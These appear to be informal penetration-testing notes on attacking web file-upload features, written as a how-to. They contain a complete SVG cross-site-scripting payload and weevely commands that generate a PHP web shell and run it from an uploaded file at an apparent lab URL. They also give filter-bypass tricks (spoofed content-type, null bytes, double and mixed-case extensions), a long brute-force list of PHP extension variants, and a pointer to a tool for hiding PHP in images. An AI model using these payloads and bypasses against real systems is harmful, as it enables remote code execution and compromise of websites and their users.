
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/file-upload/maliciousimages   it contains the bad files .swf xxs

tools 
https://github.com/almandin/fuxploider          tools 

https://medium.com/@519udhaya/unrestricted-file-upload-vulnerability-bba4491a08da


File Uploads 


xss through File Upload we can execute javascript code 
through Svg lets Talk about svg svg uses the xml inside 

payload == [


<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/
Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/
svg">
<script type="text/javascript">
alert("XSS: "+document.domain);
</script>
</svg>



]

saved the file by name payload.svg and upload 

in file Upload you have to upload shell in web app 

to make shell Use  weevely tools this is inbuilt tools available in parrot os 

weevely generate 123456 /Desktop/shell.py    # 12345 is a password 


weevely URL Password 
weevely http://s136923-101047-778.sipontum.hack.me/hackable/uploads/shell2.php.jpg 12345  #expolitation 

then run any linux command

to bypass the filter 
check headers 
content-type: image/Png 
filename : shell.php.png    #at the time checking extension

add Null Byte in filenam  -- shell.php           # not clear where

BlackListing file-extension
if .php in blacklisted use .php3
developers sometime forget case insenstive  use PHP Php PHp pHP like this

_______ tip from twitter ---------------- 
want to bypass file upload add ' ' . '  file.php'    file.php.


phtml
php3
php4
php5
inc
pHtml
pHp
pHp3
pHp4
pHp5
iNc
iNc%00
iNc%20%20%20
iNc%20%20%20…%20.%20..
iNc……
inc%00
inc%20%20%20
inc%20%20%20…%20.%20..
inc……
pHp%00
pHp%20%20%20
pHp%20%20%20…%20.%20..
pHp……
pHp3%00
pHp3%20%20%20
pHp3%20%20%20…%20.%20..
pHp3……
pHp4%00
pHp4%20%20%20
pHp4%20%20%20…%20.%20..
pHp4……
pHp5%00
pHp5%20%20%20
pHp5%20%20%20…%20.%20..
pHp5……
pHtml%00
pHtml%20%20%20
pHtml%20%20%20…%20.%20..
pHtml……
php%00
php%20%20%20
php%20%20%20…%20.%20..
php……
php3%00
php3%20%20%20
php3%20%20%20…%20.%20..
php3……
php4%00
php4%20%20%20
php4%20%20%20…%20.%20..
php4……
php5%00
php5%20%20%20
php5%20%20%20…%20.%20..
php5……
phtml%00
phtml%20%20%20
phtml%20%20%20…%20.%20..
phtml……

TIP: Bruteforce the extensions with unpopular extensions (provided above) to check acceptance.





















http://www.thexifer.net/   #this site is use to inject the php payload to the image file staneography 






